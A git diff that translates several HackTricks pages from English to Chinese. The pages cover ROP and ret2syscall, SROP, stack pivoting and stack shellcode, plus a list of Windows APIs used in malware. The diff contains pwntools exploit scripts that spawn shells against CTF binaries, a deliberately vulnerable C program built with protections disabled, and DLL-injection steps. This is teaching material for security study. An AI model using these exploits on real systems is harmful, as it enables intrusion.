 0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
 0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
 ```
+### 在内存中写入字符串
 
-### Write String in memory
-
-Then you need to find a way to write arbitrary content in this address
-
+然后你需要找到一种方法在这个地址写入任意内容
 ```bash
 ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
 mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
 ```
+### 自动化 ROP 链
 
-### Automate ROP chain
-
-The following command creates a full `sys_execve` ROP chain given a static binary when there are write-what-where gadgets and syscall instructions:
-
+以下命令在存在 write-what-where gadgets 和 syscall 指令时，给定一个静态二进制文件，创建一个完整的 `sys_execve` ROP 链：
 ```bash
 ROPgadget --binary vuln --ropchain
 ```
-
-#### 32 bits
-
+#### 32 位
 ```python
 '''
 Lets write "/bin/sh" to 0x6b6000
@@ -87,9 +78,7 @@ rop += popRax
 rop += p32(0x6b6000 + 4)
 rop += writeGadget
 ```
-
-#### 64 bits
-
+#### 64 位
 ```python
 '''
 Lets write "/bin/sh" to 0x6b6000
@@ -105,19 +94,17 @@ rop += popRax
 rop += p64(0x6b6000) # Writable memory
 rop += writeGadget #Address to: mov qword ptr [rax], rdx
 ```
+## 缺少小工具
 
-## Lacking Gadgets
-
-If you are **lacking gadgets**, for example to write `/bin/sh` in memory, you can use the **SROP technique to control all the register values** (including RIP and params registers) from the stack:
+如果你**缺少小工具**，例如在内存中写入`/bin/sh`，你可以使用**SROP技术来控制所有寄存器值**（包括RIP和参数寄存器）从栈中：
 
 {{#ref}}
 srop-sigreturn-oriented-programming.md
 {{#endref}}
 
-There might be gadgets in the vDSO region, which is used to change from user mode to kernel mode. In these type of challenges, usually a kernel image is provided to dump the vDSO region.
-
-## Exploit Example
+在vDSO区域可能会有小工具，该区域用于从用户模式切换到内核模式。在这些类型的挑战中，通常会提供一个内核映像来转储vDSO区域。
 
+## 漏洞利用示例
 ```python
 from pwn import *
 
@@ -184,17 +171,15 @@ target.sendline(payload)
 
 target.interactive()
 ```
-
-## Other Examples & References
+## 其他示例与参考
 
 - [https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html)
-  - 64 bits, no PIE, nx, write in some memory a ROP to call `execve` and jump there.
+- 64 位，无 PIE，nx，在某些内存中写入 ROP 以调用 `execve` 并跳转到那里。
 - [https://guyinatuxedo.github.io/07-bof_static/bkp16_simplecalc/index.html](https://guyinatuxedo.github.io/07-bof_static/bkp16_simplecalc/index.html)
-  - 64 bits, nx, no PIE, write in some memory a ROP to call `execve` and jump there. In order to write to the stack a function that performs mathematical operations is abused
+- 64 位，nx，无 PIE，在某些内存中写入 ROP 以调用 `execve` 并跳转到那里。为了在栈上写入一个执行数学运算的函数被滥用。
 - [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html)
-  - 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there.
+- 64 位，无 PIE，nx，BF canary，在某些内存中写入 ROP 以调用 `execve` 并跳转到那里。
 - [https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/)
-  - 32 bits, no ASLR, use vDSO to find ROP gadgets and call `execve`.
+- 32 位，无 ASLR，使用 vDSO 查找 ROP gadgets 并调用 `execve`。
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md
index a22550e5e..5f399d492 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md
@@ -2,31 +2,30 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-**`Sigreturn`** is a special **syscall** that's primarily used to clean up after a signal handler has completed its execution. Signals are interruptions sent to a program by the operating system, often to indicate that some exceptional situation has occurred. When a program receives a signal, it temporarily pauses its current work to handle the signal with a **signal handler**, a special function designed to deal with signals.
+**`Sigreturn`** 是一个特殊的 **syscall**，主要用于在信号处理程序完成其执行后进行清理。信号是操作系统发送给程序的中断，通常用于指示发生了一些异常情况。当程序接收到信号时，它会暂时暂停当前工作，以通过 **信号处理程序** 处理信号，这是一种专门设计用于处理信号的函数。
 
-After the signal handler finishes, the program needs to **resume its previous state** as if nothing happened. This is where **`sigreturn`** comes into play. It helps the program to **return from the signal handler** and restores the program's state by cleaning up the stack frame (the section of memory that stores function calls and local variables) that was used by the signal handler.
+在信号处理程序完成后，程序需要 **恢复其先前的状态**，就像什么都没有发生一样。这就是 **`sigreturn`** 发挥作用的地方。它帮助程序 **从信号处理程序返回**，并通过清理信号处理程序使用的堆栈帧（存储函数调用和局部变量的内存区域）来恢复程序的状态。
 
-The interesting part is how **`sigreturn`** restores the program's state: it does so by storing **all the CPU's register values on the stack.** When the signal is no longer blocked, **`sigreturn` pops these values off the stack**, effectively resetting the CPU's registers to their state before the signal was handled. This includes the stack pointer register (RSP), which points to the current top of the stack.
+有趣的是 **`sigreturn`** 是如何恢复程序状态的：它通过将 **所有 CPU 的寄存器值存储在堆栈上** 来实现。当信号不再被阻塞时，**`sigreturn` 从堆栈中弹出这些值**，有效地将 CPU 的寄存器重置为处理信号之前的状态。这包括指向当前堆栈顶部的堆栈指针寄存器（RSP）。
 
 > [!CAUTION]
-> Calling the syscall **`sigreturn`** from a ROP chain and **adding the registry values** we would like it to load in the **stack** it's possible to **control** all the register values and therefore **call** for example the syscall `execve` with `/bin/sh`.
+> 从 ROP 链中调用 syscall **`sigreturn`** 并 **添加我们希望它在 **堆栈** 中加载的寄存器值，可以 **控制** 所有寄存器值，因此 **调用** 例如 syscall `execve` 和 `/bin/sh`。
 
-Note how this would be a **type of Ret2syscall** that makes much easier to control params to call other Ret2syscalls:
+注意这将是一种 **Ret2syscall** 类型，使得控制参数以调用其他 Ret2syscalls 变得更加容易：
 
 {{#ref}}
 rop-syscall-execv.md
 {{#endref}}
 
-For a better explanation check also:
+要更好地理解，请查看：
 
 {% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
 
-## Example
-
-You can [**find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop/using-srop), although this is the final exploit from there:
+## 示例
 
+您可以 [**在这里找到一个示例**](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop/using-srop)，尽管这是来自那里的最终利用：
 ```python
 from pwn import *
 
@@ -53,11 +52,9 @@ payload += bytes(frame)
 p.sendline(payload)
 p.interactive()
 ```
-
-## References
+## 参考
 
 - [https://youtu.be/ADULSwnQs-s?feature=shared](https://youtu.be/ADULSwnQs-s?feature=shared)
 - [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
index 53e6040e0..c4e126a74 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
@@ -2,61 +2,58 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-This technique exploits the ability to manipulate the **Base Pointer (EBP)** to chain the execution of multiple functions through careful use of the EBP register and the `leave; ret` instruction sequence.
-
-As a reminder, **`leave`** basically means:
+该技术利用操控 **基指针 (EBP)** 的能力，通过仔细使用 EBP 寄存器和 `leave; ret` 指令序列来链接多个函数的执行。
 
+作为提醒，**`leave`** 基本上意味着：
 ```
 mov               esp, ebp
 pop               ebp
 ret
 ```
-
-And as the **EBP is in the stack** before the EIP it's possible to control it controlling the stack.
+由于**EBP在栈中**位于EIP之前，因此可以通过控制栈来控制它。
 
 ### EBP2Ret
 
-This technique is particularly useful when you can **alter the EBP register but have no direct way to change the EIP register**. It leverages the behaviour of functions when they finish executing.
+当你**可以更改EBP寄存器但没有直接方法更改EIP寄存器**时，这种技术特别有用。它利用了函数执行完毕后的行为。
 
-If, during `fvuln`'s execution, you manage to inject a **fake EBP** in the stack that points to an area in memory where your shellcode's address is located (plus 4 bytes to account for the `pop` operation), you can indirectly control the EIP. As `fvuln` returns, the ESP is set to this crafted location, and the subsequent `pop` operation decreases ESP by 4, **effectively making it point to an address store by the attacker in there.**\
-Note how you **need to know 2 addresses**: The one where ESP is going to go, where you will need to write the address that is pointed by ESP.
+如果在`fvuln`执行期间，你设法在栈中注入一个**假EBP**，指向内存中你的shellcode地址所在的区域（加上4个字节以考虑`pop`操作），你可以间接控制EIP。当`fvuln`返回时，ESP被设置为这个构造的位置，随后的`pop`操作将ESP减少4，**有效地使其指向攻击者在其中存储的地址。**\
+注意你**需要知道2个地址**：ESP将要去的地址，以及你需要写入的ESP指向的地址。
 
 #### Exploit Construction
 
-First you need to know an **address where you can write arbitrary data / addresses**. The ESP will point here and **run the first `ret`**.
+首先，你需要知道一个**可以写入任意数据/地址的地址**。ESP将在这里指向并**运行第一个`ret`**。
 
-Then, you need to know the address used by `ret` that will **execute arbitrary code**. You could use:
+然后，你需要知道`ret`使用的地址，该地址将**执行任意代码**。你可以使用：
 
-- A valid [**ONE_GADGET**](https://github.com/david942j/one_gadget) address.
-- The address of **`system()`** followed by **4 junk bytes** and the address of `"/bin/sh"` (x86 bits).
-- The address of a **`jump esp;`** gadget ([**ret2esp**](ret2esp-ret2reg.md)) followed by the **shellocde** to execute.
-- Some [**ROP**](rop-return-oriented-programing.md) chain
+- 一个有效的[**ONE_GADGET**](https://github.com/david942j/one_gadget)地址。
+- **`system()`**的地址，后面跟着**4个垃圾字节**和`"/bin/sh"`的地址（x86位）。
+- 一个**`jump esp;`** gadget的地址（[**ret2esp**](ret2esp-ret2reg.md)），后面跟着要执行的**shellcode**。
+- 一些[**ROP**](rop-return-oriented-programing.md)链
 
-Remember than before any of these addresses in the controlled part of the memory, there must be **`4` bytes** because of the **`pop`** part of the `leave` instruction. It would be possible to abuse these 4B to set a **second fake EBP** and continue controlling the execution.
+请记住，在受控内存的这些地址之前，必须有**`4`个字节**，因为**`pop`**部分的`leave`指令。可以利用这4个字节设置一个**第二个假EBP**，并继续控制执行。
 
 #### Off-By-One Exploit
 
-There's a specific variant of this technique known as an "Off-By-One Exploit". It's used when you can **only modify the least significant byte of the EBP**. In such a case, the memory location storing the address to jumo to with the **`ret`** must share the first three bytes with the EBP, allowing for a similar manipulation with more constrained conditions.
+这种技术有一个特定的变体，称为“Off-By-One Exploit”。当你**只能修改EBP的最低有效字节**时使用。在这种情况下，存储要跳转到的地址的内存位置与**`ret`**必须与EBP共享前三个字节，从而允许在更受限的条件下进行类似的操作。
 
 ### **EBP Chaining**
 
-Therefore, putting a controlled address in the `EBP` entry of the stack and an address to `leave; ret` in `EIP`, it's possible to **move the `ESP` to the controlled `EBP` address from the stack**.
+因此，将一个受控地址放入栈的`EBP`条目中，并在`EIP`中放入一个`leave; ret`的地址，可以**将`ESP`从栈移动到受控的`EBP`地址**。
 
-Now, the **`ESP`** is controlled pointing to a desired address and the next instruction to execute is a `RET`. To abuse this, it's possible to place in the controlled ESP place this:
+现在，**`ESP`**被控制，指向所需的地址，下一条要执行的指令是`RET`。为了利用这一点，可以在受控ESP位置放置以下内容：
 
-- **`&(next fake EBP)`** -> Load the new EBP because of `pop ebp` from the `leave` instruction
-- **`system()`** -> Called by `ret`
-- **`&(leave;ret)`** -> Called after system ends, it will move ESP to the fake EBP and start agin
-- **`&("/bin/sh")`**-> Param fro `system`
+- **`&(next fake EBP)`** -> 由于`leave`指令中的`pop ebp`加载新的EBP
+- **`system()`** -> 由`ret`调用
+- **`&(leave;ret)`** -> 在system结束后调用，它将ESP移动到假EBP并重新开始
+- **`&("/bin/sh")`**-> `system`的参数
 
-Basically this way it's possible to chain several fake EBPs to control the flow of the program.
+基本上，这种方式可以链接多个假EBP以控制程序的流程。
 
-This is like a [ret2lib](ret2lib/), but more complex with no apparent benefit but could be interesting in some edge-cases.
-
-Moreover, here you have an [**example of a challenge**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/leave) that uses this technique with a **stack leak** to call a winning function. This is the final payload from the page:
+这就像一个[ret2lib](ret2lib/)，但更复杂，没有明显的好处，但在某些边缘情况下可能会很有趣。
 
+此外，这里有一个[**挑战示例**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/leave)，使用这种技术与**栈泄漏**来调用一个成功的函数。这是页面的最终有效载荷：
 ```python
 from pwn import *
 
@@ -72,34 +69,32 @@ POP_RDI = 0x40122b
 POP_RSI_R15 = 0x401229
 
 payload = flat(
-    0x0,               # rbp (could be the address of anoter fake RBP)
-    POP_RDI,
-    0xdeadbeef,
-    POP_RSI_R15,
-    0xdeadc0de,
-    0x0,
-    elf.sym['winner']
+0x0,               # rbp (could be the address of anoter fake RBP)
+POP_RDI,
+0xdeadbeef,
+POP_RSI_R15,
+0xdeadc0de,
+0x0,
+elf.sym['winner']
 )
 
 payload = payload.ljust(96, b'A')     # pad to 96 (just get to RBP)
 
 payload += flat(
-    buffer,         # Load leak address in RBP
-    LEAVE_RET       # Use leave ro move RSP to the user ROP chain and ret to execute it
+buffer,         # Load leak address in RBP
+LEAVE_RET       # Use leave ro move RSP to the user ROP chain and ret to execute it
 )
 
 pause()
 p.sendline(payload)
 print(p.recvline())
 ```
+## EBP 是无用的
 
-## EBP is useless
-
-As [**explained in this post**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#off-by-one-1), if a binary is compiled with some optimizations, the **EBP never gets to control ESP**, therefore, any exploit working by controlling EBP sill basically fail because it doesn't have ay real effect.\
-This is because the **prologue and epilogue changes** if the binary is optimized.
-
-- **Not optimized:**
+正如[**在这篇文章中解释的**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#off-by-one-1)，如果一个二进制文件经过一些优化编译，**EBP 永远无法控制 ESP**，因此，任何通过控制 EBP 的漏洞基本上都会失败，因为它没有任何实际效果。\
+这是因为如果二进制文件经过优化，**前言和后记会发生变化**。
 
+- **未优化：**
 ```bash
 push   %ebp         # save ebp
 mov    %esp,%ebp    # set new ebp
@@ -110,9 +105,7 @@ sub    $0x100,%esp  # increase stack size
 leave               # restore ebp (leave == mov %ebp, %esp; pop %ebp)
 ret                 # return
 ```
-
-- **Optimized:**
-
+- **优化：**
 ```bash
 push   %ebx         # save ebx
 sub    $0x100,%esp  # increase stack size
@@ -123,13 +116,11 @@ add    $0x10c,%esp  # reduce stack size
 pop    %ebx         # restore ebx
 ret                 # return
 ```
+## 其他控制 RSP 的方法
 
-## Other ways to control RSP
-
-### **`pop rsp`** gadget
-
-[**In this page**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp) you can find an example using this technique. For this challenge it was needed to call a function with 2 specific arguments, and there was a **`pop rsp` gadget** and there is a **leak from the stack**:
+### **`pop rsp`** 小工具
 
+[**在此页面**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp) 你可以找到使用此技术的示例。对于这个挑战，需要调用一个带有 2 个特定参数的函数，并且有一个 **`pop rsp` 小工具** 和一个 **来自栈的泄漏**：
 ```python
 # Code from https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp
 # This version has added comments
@@ -149,15 +140,15 @@ POP_RSI_R15 = 0x401229     # pop RSI and R15
 
 # The payload starts
 payload = flat(
-    0,                 # r13
-    0,                 # r14
-    0,                 # r15
-    POP_RDI,
-    0xdeadbeef,
-    POP_RSI_R15,
-    0xdeadc0de,
-    0x0,               # r15
-    elf.sym['winner']
+0,                 # r13
+0,                 # r14
+0,                 # r15
+POP_RDI,
+0xdeadbeef,
+POP_RSI_R15,
+0xdeadc0de,
+0x0,               # r15
+elf.sym['winner']
 )
 
 payload = payload.ljust(104, b'A')     # pad to 104
@@ -165,27 +156,23 @@ payload = payload.ljust(104, b'A')     # pad to 104
 # Start popping RSP, this moves the stack to the leaked address and
 # continues the ROP chain in the prepared payload
 payload += flat(
-    POP_CHAIN,
-    buffer             # rsp
+POP_CHAIN,
+buffer             # rsp
 )
 
 pause()
 p.sendline(payload)
 print(p.recvline())
 ```
-
 ### xchg \<reg>, rsp gadget
-
 ```
 pop <reg>                <=== return pointer
 <reg value>
 xchg <reg>, rsp
 ```
-
-## References
+## 参考
 
 - [https://bananamafia.dev/post/binary-rop-stackpivot/](https://bananamafia.dev/post/binary-rop-stackpivot/)
 - [https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md
index 18f3baff0..830109af5 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md
@@ -2,49 +2,44 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-**Stack shellcode** is a technique used in binary exploitation where an attacker writes shellcode to a vulnerable program's stack and then modifies the **Instruction Pointer (IP)** or **Extended Instruction Pointer (EIP)** to point to the location of this shellcode, causing it to execute. This is a classic method used to gain unauthorized access or execute arbitrary commands on a target system. Here's a breakdown of the process, including a simple C example and how you might write a corresponding exploit using Python with **pwntools**.
+**Stack shellcode** 是一种用于二进制利用的技术，攻击者将 shellcode 写入易受攻击程序的栈中，然后修改 **Instruction Pointer (IP)** 或 **Extended Instruction Pointer (EIP)** 以指向该 shellcode 的位置，从而导致其执行。这是一种经典的方法，用于获得未授权访问或在目标系统上执行任意命令。以下是该过程的分解，包括一个简单的 C 示例以及如何使用 Python 和 **pwntools** 编写相应的利用代码。
 
-### C Example: A Vulnerable Program
-
-Let's start with a simple example of a vulnerable C program:
+### C 示例：一个易受攻击的程序
 
+让我们从一个简单的易受攻击的 C 程序示例开始：
 ```c
 #include <stdio.h>
 #include <string.h>
 
 void vulnerable_function() {
-    char buffer[64];
-    gets(buffer); // Unsafe function that does not check for buffer overflow
+char buffer[64];
+gets(buffer); // Unsafe function that does not check for buffer overflow
 }
 
 int main() {
-    vulnerable_function();
-    printf("Returned safely\n");
-    return 0;
+vulnerable_function();
+printf("Returned safely\n");
+return 0;
 }
 ```
+该程序由于使用了 `gets()` 函数而容易受到缓冲区溢出攻击。
 
-This program is vulnerable to a buffer overflow due to the use of the `gets()` function.
-
-### Compilation
-
-To compile this program while disabling various protections (to simulate a vulnerable environment), you can use the following command:
+### 编译
 
+要在禁用各种保护的情况下编译此程序（以模拟易受攻击的环境），您可以使用以下命令：
 ```sh
 gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
 ```
+- `-fno-stack-protector`: 禁用栈保护。
+- `-z execstack`: 使栈可执行，这对于执行存储在栈上的 shellcode 是必要的。
+- `-no-pie`: 禁用位置无关可执行文件，使预测我们的 shellcode 将位于哪个内存地址更容易。
+- `-m32`: 将程序编译为 32 位可执行文件，通常用于简化漏洞开发。
 
-- `-fno-stack-protector`: Disables stack protection.
-- `-z execstack`: Makes the stack executable, which is necessary for executing shellcode stored on the stack.
-- `-no-pie`: Disables Position Independent Executable, making it easier to predict the memory address where our shellcode will be located.
-- `-m32`: Compiles the program as a 32-bit executable, often used for simplicity in exploit development.
-
-### Python Exploit using Pwntools
-
-Here's how you could write an exploit in Python using **pwntools** to perform a **ret2shellcode** attack:
+### 使用 Pwntools 的 Python 漏洞
 
+以下是如何使用 **pwntools** 在 Python 中编写一个 **ret2shellcode** 攻击的漏洞：
 ```python
 from pwn import *
 
@@ -71,26 +66,24 @@ payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide
 p.sendline(payload)
 p.interactive()
 ```
+这个脚本构造了一个有效载荷，由**NOP滑块**、**shellcode**组成，然后用指向NOP滑块的地址覆盖**EIP**，确保shellcode被执行。
 
-This script constructs a payload consisting of a **NOP slide**, the **shellcode**, and then overwrites the **EIP** with the address pointing to the NOP slide, ensuring the shellcode gets executed.
+**NOP滑块**（`asm('nop')`）用于增加执行“滑入”我们的shellcode的机会，无论确切地址是什么。调整`p32()`参数为缓冲区的起始地址加上一个偏移量，以便落入NOP滑块。
 
-The **NOP slide** (`asm('nop')`) is used to increase the chance that execution will "slide" into our shellcode regardless of the exact address. Adjust the `p32()` argument to the starting address of your buffer plus an offset to land in the NOP slide.
+## 保护措施
 
-## Protections
+- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **应该被禁用**，以确保地址在执行之间是可靠的，否则存储函数的地址不会总是相同，你需要一些泄漏信息来找出win函数加载的位置。
+- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) 也应该被禁用，否则被破坏的EIP返回地址将永远不会被跟随。
+- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md) **栈**保护将阻止在栈内执行shellcode，因为该区域将不可执行。
 
-- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
-- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
-- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable.
-
-## Other Examples & References
+## 其他示例与参考
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/shellcode](https://ir0nstone.gitbook.io/notes/types/stack/shellcode)
 - [https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html)
-  - 64bit, ASLR with stack address leak, write shellcode and jump to it
+- 64位，ASLR与栈地址泄漏，写入shellcode并跳转到它
 - [https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html)
-  - 32 bit, ASLR with stack leak, write shellcode and jump to it
+- 32位，ASLR与栈泄漏，写入shellcode并跳转到它
 - [https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html)
-  - 32 bit, ASLR with stack leak, comparison to prevent call to exit(), overwrite variable with a value and write shellcode and jump to it
+- 32位，ASLR与栈泄漏，比较以防止调用exit()，用一个值覆盖变量并写入shellcode并跳转到它
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing/common-api-used-in-malware.md b/src/reversing/common-api-used-in-malware.md
index 435a2e2bc..786573087 100644
--- a/src/reversing/common-api-used-in-malware.md
+++ b/src/reversing/common-api-used-in-malware.md
@@ -1,12 +1,12 @@
-# Common API used in Malware
+# 常见的恶意软件使用的API
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Generic
+## 通用
 
-### Networking
+### 网络
 
-| Raw Sockets   | WinAPI Sockets |
+| 原始套接字   | WinAPI 套接字 |
 | ------------- | -------------- |
 | socket()      | WSAStratup()   |
 | bind()        | bind()         |
@@ -17,9 +17,9 @@
 | write()       | send()         |
 | shutdown()    | WSACleanup()   |
 
-### Persistence
+### 持久性
 
-| Registry         | File          | Service                      |
+| 注册表         | 文件          | 服务                      |
 | ---------------- | ------------- | ---------------------------- |
 | RegCreateKeyEx() | GetTempPath() | OpenSCManager                |
 | RegOpenKeyEx()   | CopyFile()    | CreateService()              |
@@ -27,9 +27,9 @@
 | RegDeleteKeyEx() | WriteFile()   |                              |
 | RegGetValue()    | ReadFile()    |                              |
 
-### Encryption
+### 加密
 
-| Name                  |
+| 名称                  |
 | --------------------- |
 | WinCrypt              |
 | CryptAcquireContext() |
@@ -38,34 +38,34 @@
 | CryptDecrypt()        |
 | CryptReleaseContext() |
 
-### Anti-Analysis/VM
+### 反分析/虚拟机
 
-| Function Name                                             | Assembly Instructions |
+| 函数名称                                             | 汇编指令 |
 | --------------------------------------------------------- | --------------------- |
 | IsDebuggerPresent()                                       | CPUID()               |
 | GetSystemInfo()                                           | IN()                  |
 | GlobalMemoryStatusEx()                                    |                       |
 | GetVersion()                                              |                       |
-| CreateToolhelp32Snapshot \[Check if a process is running] |                       |
-| CreateFileW/A \[Check if a file exist]                    |                       |
+| CreateToolhelp32Snapshot \[检查进程是否在运行] |                       |
+| CreateFileW/A \[检查文件是否存在]                    |                       |
 
-### Stealth
+### 隐匿
 
-| Name                     |                                                                            |
+| 名称                     |                                                                            |
 | ------------------------ | -------------------------------------------------------------------------- |
-| VirtualAlloc             | Alloc memory (packers)                                                     |
-| VirtualProtect           | Change memory permission (packer giving execution permission to a section) |
-| ReadProcessMemory        | Injection into external processes                                          |
-| WriteProcessMemoryA/W    | Injection into external processes                                          |
+| VirtualAlloc             | 分配内存 (打包器)                                                     |
+| VirtualProtect           | 更改内存权限 (打包器给予某个部分执行权限) |
+| ReadProcessMemory        | 注入到外部进程                                          |
+| WriteProcessMemoryA/W    | 注入到外部进程                                          |
 | NtWriteVirtualMemory     |                                                                            |
-| CreateRemoteThread       | DLL/Process injection...                                                   |
+| CreateRemoteThread       | DLL/进程注入...                                                   |
 | NtUnmapViewOfSection     |                                                                            |
 | QueueUserAPC             |                                                                            |
 | CreateProcessInternalA/W |                                                                            |
 
-### Execution
+### 执行
 
-| Function Name    |
+| 函数名称    |
 | ---------------- |
 | CreateProcessA/W |
 | ShellExecute     |
@@ -73,68 +73,67 @@
 | ResumeThread     |
 | NtResumeThread   |
 
-### Miscellaneous
+### 其他
 
-- GetAsyncKeyState() -- Key logging
-- SetWindowsHookEx -- Key logging
-- GetForeGroundWindow -- Get running window name (or the website from a browser)
-- LoadLibrary() -- Import library
-- GetProcAddress() -- Import library
-- CreateToolhelp32Snapshot() -- List running processes
-- GetDC() -- Screenshot
-- BitBlt() -- Screenshot
-- InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- Access the Internet
-- FindResource(), LoadResource(), LockResource() -- Access resources of the executable
+- GetAsyncKeyState() -- 键盘记录
+- SetWindowsHookEx -- 键盘记录
+- GetForeGroundWindow -- 获取正在运行的窗口名称 (或浏览器中的网站)
+- LoadLibrary() -- 导入库
+- GetProcAddress() -- 导入库
+- CreateToolhelp32Snapshot() -- 列出正在运行的进程
+- GetDC() -- 截图
+- BitBlt() -- 截图
+- InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- 访问互联网
+- FindResource(), LoadResource(), LockResource() -- 访问可执行文件的资源
 
-## Malware Techniques
+## 恶意软件技术
 
-### DLL Injection
+### DLL 注入
 
-Execute an arbitrary DLL inside another process
+在另一个进程中执行任意 DLL
 
-1. Locate the process to inject the malicious DLL: CreateToolhelp32Snapshot, Process32First, Process32Next
-2. Open the process: GetModuleHandle, GetProcAddress, OpenProcess
-3. Write the path to the DLL inside the process: VirtualAllocEx, WriteProcessMemory
-4. Create a thread in the process that will load the malicious DLL: CreateRemoteThread, LoadLibrary
+1. 定位要注入恶意 DLL 的进程：CreateToolhelp32Snapshot, Process32First, Process32Next
+2. 打开进程：GetModuleHandle, GetProcAddress, OpenProcess
+3. 在进程中写入 DLL 的路径：VirtualAllocEx, WriteProcessMemory
+4. 在进程中创建一个线程以加载恶意 DLL：CreateRemoteThread, LoadLibrary
 
-Other functions to use: NTCreateThreadEx, RtlCreateUserThread
+其他可用的函数：NTCreateThreadEx, RtlCreateUserThread
 
-### Reflective DLL Injection
+### 反射 DLL 注入
 
-Load a malicious DLL without calling normal Windows API calls.\
-The DLL is mapped inside a process, it will resolve the import addresses, fix the relocations and call the DllMain function.
+在不调用正常 Windows API 调用的情况下加载恶意 DLL。\
+DLL 在进程中映射，它将解析导入地址，修复重定位并调用 DllMain 函数。
 
-### Thread Hijacking
+### 线程劫持
 
-Find a thread from a process and make it load a malicious DLL
+从进程中找到一个线程并使其加载恶意 DLL
 
-1. Find a target thread: CreateToolhelp32Snapshot, Thread32First, Thread32Next
-2. Open the thread: OpenThread
-3. Suspend the thread: SuspendThread
-4. Write the path to the malicious DLL inside the victim process: VirtualAllocEx, WriteProcessMemory
-5. Resume the thread loading the library: ResumeThread
+1. 找到目标线程：CreateToolhelp32Snapshot, Thread32First, Thread32Next
+2. 打开线程：OpenThread
+3. 暂停线程：SuspendThread
+4. 在受害者进程中写入恶意 DLL 的路径：VirtualAllocEx, WriteProcessMemory
+5. 恢复加载库的线程：ResumeThread
 
-### PE Injection
+### PE 注入
 
-Portable Execution Injection: The executable will be written in the memory of the victim process and it will be executed from there.
